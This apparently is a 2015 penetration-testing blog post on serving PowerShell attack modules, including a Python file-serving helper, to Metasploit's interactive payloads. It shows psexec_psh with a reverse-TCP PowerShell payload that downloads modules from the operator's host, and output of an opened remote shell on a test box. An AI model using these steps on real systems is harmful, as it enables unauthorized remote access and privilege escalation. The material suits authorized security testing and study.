Interactive Powershell in Metasploit

The fine folks over at Netitude were recently able to get interactive powershell payloads in Metasploit. With the ever growing arsenal of Powershell tools out there, this is huge! Thanks to Ben Turner and David Hardy for their excellent work.

More recently, Larry Spohn over at TrustedSec wrote up a great post showing how sed and Apache can be used to make practical use of these new payloads. There is nothing wrong with Larry's method for hosting your PowerShell repository and loading it into MSF, but I figured this could all be done in one step. In that spirit, I put together a Python script named "powerserver" to accomplish this.

Running the script is simple: just feed it your PowerShell module directory path and the IP and port to host on. The script changes into the directory you specified, walks it for every .ps1 file, and prints a handy comma-separated list of URLs you can copy and paste directly into MSF. It then serves that directory with Python's SimpleHTTPServer so the payload can fetch the modules.

python powerserver -p /path/to/powershell_scripts -i [ip_address]:[port]


awh@jabberwock:~/$ python powerserver -p /opt/PowerTools/ -i
[*] Directory found

[*] Copy and paste the below to MSF:,,,,,,,,,,,,,,,,

[*] Now starting webserver

[*] serving at port 8080
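The following is an added example of the same idea, not the original powerserver script: walk a module directory, turn every .ps1 file into a URL on the host:port you intend to serve from, join the list with commas in the shape LOAD_MODULES expects, and then serve the directory over plain HTTP. The sample module tree it builds (PowerUp/PowerUp.ps1, PowerView/powerview.ps1 and two non-module files) is constructed for the demonstration, and the function names and argument flags are this example's own.

```python
#!/usr/bin/env python3
"""powerserver-style helper: list .ps1 files as URLs for LOAD_MODULES and serve them.

Added example; not the original powerserver script. Function names and flags are
this example's own assumptions.
"""
import argparse
import os
import tempfile
import urllib.parse
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer


def find_ps1_files(root):
    """Walk `root` and return every .ps1 path relative to it, sorted, with '/' separators."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".ps1"):
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                found.append(rel.replace(os.sep, "/"))
    return sorted(found)


def build_load_modules(root, hostport):
    """Return the comma-separated URL list to paste into MSF's LOAD_MODULES option."""
    urls = []
    for rel in find_ps1_files(root):
        # Quote each path segment separately so spaces or odd characters survive as a URL.
        quoted = "/".join(urllib.parse.quote(seg) for seg in rel.split("/"))
        urls.append("http://%s/%s" % (hostport, quoted))
    return ",".join(urls)


def parse_hostport(value):
    """Split 'ip:port' into (ip, int port); reject anything that is not that shape."""
    host, sep, port = value.rpartition(":")
    if not sep or not host or not port.isdigit():
        raise ValueError("expected ip:port, got %r" % value)
    return host, int(port)


def serve(root, hostport):
    """Serve `root` over HTTP, bound only to the advertised address (not all interfaces)."""
    host, port = parse_hostport(hostport)
    handler = partial(SimpleHTTPRequestHandler, directory=root)  # Python 3.7+
    httpd = ThreadingHTTPServer((host, port), handler)
    print("[*] serving %s at %s:%d" % (root, host, port))
    httpd.serve_forever()


def make_sample_tree():
    """Constructed sample module directory so the example runs offline."""
    root = tempfile.mkdtemp(prefix="powertools_")
    layout = {
        "PowerUp/PowerUp.ps1": "function Get-ServicePerms { }\n",
        "PowerView/powerview.ps1": "function Get-NetUser { }\n",
        "README.md": "not a module\n",
        "PowerUp/notes.txt": "also not a module\n",
    }
    for rel, body in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


def main():
    ap = argparse.ArgumentParser(description="List .ps1 modules as URLs and serve them.")
    ap.add_argument("-p", "--path", help="PowerShell module directory (default: sample tree)")
    ap.add_argument("-i", "--hostport", default="127.0.0.1:8080", help="ip:port to serve on")
    ap.add_argument("--no-serve", action="store_true", help="print the list and exit")
    args = ap.parse_args()

    root = os.path.abspath(args.path) if args.path else make_sample_tree()
    if not os.path.isdir(root):
        raise SystemExit("[-] %s is not a directory" % root)
    print("[*] Directory found")
    modules = find_ps1_files(root)
    print("[*] Copy and paste the below to MSF (%d modules):" % len(modules))
    print(build_load_modules(root, args.hostport))
    if not args.no_serve:
        print("[*] Now starting webserver")
        serve(root, args.hostport)


if __name__ == "__main__":
    main()
```

Two points worth keeping in mind when using something like this: the server hands out everything under the directory to anyone who can reach that port, so bind it to the engagement interface and stop it when the session is up; and the module list is only as trustworthy as the directory it was built from, so keep your tools repository at a known commit rather than serving whatever happens to be checked out.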

With our Python SimpleHTTPServer up and running, we can configure Metasploit. For simplicity, I'm using the "psexec_psh" module in MSF with the 64-bit interactive PowerShell payload.

Set the payload to any of the interactive powershell payloads:

msf exploit(psexec_psh) > show options


Payload options (windows/x64/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   EXITFUNC      thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST                          yes       The listen address
   LOAD_MODULES                   no        A list of powershell modules seperated by a comma to download over the web
   LPORT         4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

You can preload your modules with the list that the script generated. Simply set the "LOAD_MODULES" option:

msf exploit(psexec_psh) > set LOAD_MODULES,,,,,,,,,,,,,,,,
LOAD_MODULES =>,,,,,,,,,,,,,,,,

msf exploit(psexec_psh) > exploit

[*] Loading 17 modules into the interactive PowerShell session
[*] Started reverse SSL handler on 
[*] - Executing the payload...
[+] - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 3 opened ( -> at 2015-07-21 11:36:59 -0600

Windows PowerShell running as user BOB$ on TESTBOX1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

[+] Loading modules.

PS C:\Windows\system32>

Awesome. With our shell we can confirm that one of the PowerTools functions is loaded:

PS C:\Windows\system32> get-help get-serviceperms

    Returns a list of services that the user can modify.
    Get-ServicePerms [<CommonParameters>]
    This function enumerates all available services and tries to
    open the service for modification, returning the service object
    if the open doesn't fail.


    To see the examples, type: "get-help Get-ServicePerms -examples".
    For more information, type: "get-help Get-ServicePerms -detailed".
    For technical information, type: "get-help Get-ServicePerms -full".

PS C:\Windows\system32> 

Installing is easy, peasy, lime and squeezy:

git clone

Beware the JabberWock, my son!

